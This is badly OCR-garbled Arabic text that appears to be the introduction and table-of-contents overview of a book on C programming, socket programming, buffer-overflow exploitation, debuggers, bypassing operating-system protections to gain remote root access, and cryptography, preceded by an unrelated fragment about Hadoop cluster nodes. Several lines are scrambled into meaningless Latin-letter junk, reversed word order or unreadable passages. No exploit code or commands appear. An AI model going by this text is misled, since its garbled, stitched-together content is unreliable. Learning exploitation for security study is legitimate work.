بالطبع» كا نعلم أننا أمام e$‏ كبير من ال Nodes‏ داخل ال JLL s Cluster‏ نحن بحاجة لإدارة هذه ال „Resources‏ 


"Base Modules" le ios «Apache Hadoop الأساسية لل‎ eus) كانت هذه هى‎ 
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ستتعلم في هذا الكتاب مايلي: 

۰ البرمجه بلغة ال C‏ ۰ وفهم وتحليل الأكواد البرمجية. 
۰ شبكات الحاسب « وكيفية برمجة ال «Sockets‏ 
وإنشاء الإتصالات بين الأنظمه. 

Buffer Overflows إيجاد ثغرات في الأنظمه واستغلانها باستخدام هجمات ال‎ e 

System Memory وال‎ Processor Registers لفحص ال‎ Debuggers استخدام ال‎ ٠ 
كيفية التغلب والتحايّل على آليات الحمايه في أنظمة التشغيل « والحصول على صلاحيات‎ e 
. على الأنظمه البعيدة‎ root أو ال‎ system ال‎ 

٠‏ خوارزميات وأنظمة التشفیر» وتحليلهاء وفهم تطبيقاتها المُتَعندَه. 


نقوم في لاب الأول ly‏ قراءة وكتابة الأكواد البرمجيه؛ ودراسة أنظمة التشغيل jks‏ 
تعاطيها مع البرامج» حيث تعد الأساس لبقية الأبواب. 


في الباب الثاني ننتقل إلى عالم الشبكات؛ لنتعرف على آليات وبُروتوكولات الشبكات؛ 
وكيفية انتقال البيانات بين الآنظمةء lex;‏ من Application Layer)‏ وانتهاء بال 
Physical Layer‏ . 

dure‏ تدب و و aay oh‏ لد 
بين : 


في لاب الك قوم يط لضوء على spc‏ شین شه امن 
في بينة الشبّكات: ‘Debuggers A aptae ay CUS mig ers‏ > ونختم 
بإجراء اختبار اختراق عقلي. 


واخيرأء في الباب SRI‏ إلى علوم تشفير البيانات» oua aii‏ لآليات تحقيق الأمان 
باستخدام خوارزميات التشفيرء مَع دراسه لبعض الانظمة المتكاملة المستخدمة لتوفير 
a gh gal‏ والخصوصية. وسلامة البيانات أثناء انتقالها من مکان لآخر. 


mede 


۰۴ 


